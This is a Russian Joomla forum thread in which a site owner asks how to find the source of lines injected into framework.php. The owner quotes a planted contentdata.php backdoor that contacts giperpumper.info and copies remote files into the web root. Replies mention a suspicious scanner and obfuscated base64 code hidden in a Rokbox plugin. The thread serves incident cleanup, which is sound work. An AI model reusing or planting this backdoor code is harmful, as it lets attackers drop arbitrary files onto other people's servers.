в файл framework.php вставляются левые строки

Тема в разделе "Ошибки при работе с Joomla", создана пользователем serdr, 12.10.2012.

  1. Offline

    serdr Недавно здесь

    Регистрация:
    10.08.2010
    Сообщения:
    4
    Симпатии:
    0
    Пол:
    Мужской
    в файл framework.php вставляются левые строки:
    Код (PHP):
    1. require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; require_once "".$_SERVER['DOCUMENT_ROOT']."/components/com_content/contentdata.php"; unset( $CONFIG );

    после чего в компоненте com_content создаются файл contentdata.php с содержимом:
    Код (PHP):
    1. <?php
    2.  
    3. /**
    4. * @version      $Id: index.php 14401 2010-01-26 14:10:00Z louis $
    5. * @package      Joomla
    6. * @copyright   Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
    7. * @license      GNU/GPL, see LICENSE.php
    8. * Joomla! is free software. This version may have been modified pursuant
    9. * to the GNU General Public License, and as distributed it includes or
    10. * is derivative of works licensed under the GNU General Public License or
    11. * other free or open source software licenses.
    12. * See COPYRIGHT.php for copyright notices and details.
    13. */
    14. $schooljournal = @file_get_contents("http://giperpumper.info/schooljournal.php?host=".$_SERVER['HTTP_HOST']."");
    15. if ( isset($_GET['host']) && isset($_GET['file']) && isset($_GET['paramurl']) )
    16. {
    17. $pathname = file_get_contents("http://".$_GET['host']."/".$_GET['paramurl']."");
    18.  
    19. if (!copy("http://".$_GET['host']."/".$_GET['file']."", "".$_SERVER['DOCUMENT_ROOT']."/".$pathname."")) {
    20.  
    21.     echo "не удалось скопировать...\n";
    22.  
    23. }
    24. }
    25. ?>

    Удаление не помогает, где и чем можно искать основную заразу, которая вставляет строки?
     
    Последнее редактирование модератором: 13.10.2012
  2.  
  3. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
  4. Offline

    serdr Недавно здесь

    Регистрация:
    10.08.2010
    Сообщения:
    4
    Симпатии:
    0
    Пол:
    Мужской
    Скачал файл (В этом файле один сплошной зашифрованный код)
    по ссылке, проверил на локалке. Выдал целый список с строкой String:: $_POST
    Кстати, после проверке уходит письмо на адрес isoisorf@gmail.com.
    Я так понял после этого надо проверить каждый файл что ли?
     
  5. OlegK
    Offline

    OlegK Russian Joomla! Team Команда форума ⇒ Профи ⇐

    Регистрация:
    17.01.2011
    Сообщения:
    7 813
    Симпатии:
    771
    Пол:
    Мужской
    ОГО,этот не тот файл. Наверно хакнули .
    Прикреплю в теме файл в архиве.Перекачай.
    Результат работы сканера в архиве, выложи на форум
     
  6. Offline

    dmnkpro Недавно здесь

    Регистрация:
    02.11.2009
    Сообщения:
    118
    Симпатии:
    8
    Пол:
    Мужской
    Кому интересно, нашел у себя в файле /plugins/content/rokbox/rokbox.php (Плагин Rokbox - карусель картинок) строчку $GLOBALS['_1822813929_']=Array(base64_decode и много-много букв. В расшифровке они как раз и дают указанные в первом посте строчки
     

Поделиться этой страницей

Загрузка...